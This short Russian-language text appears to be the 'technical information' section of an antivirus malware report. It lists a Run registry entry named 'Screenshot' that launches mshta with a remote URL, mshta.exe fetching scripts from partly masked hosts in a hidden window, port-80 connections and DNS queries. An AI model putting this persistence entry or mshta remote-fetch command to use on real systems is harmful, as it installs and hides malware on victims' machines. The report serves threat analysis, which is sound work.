Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Screenshot' = 'mshta http://dlsc.af/wp-admin/buy/1.html'
- '<SYSTEM32>\mshta.exe' http://j.#p/wodsfsd4as3asd3
- 'j.#p':80
- 'ma##.#oteloscar.in':80
- DNS ASK j.#p
- DNS ASK ma##.#oteloscar.in
- '<SYSTEM32>\mshta.exe' http://j.#p/wodsfsd4as3asd3' (со скрытым окном)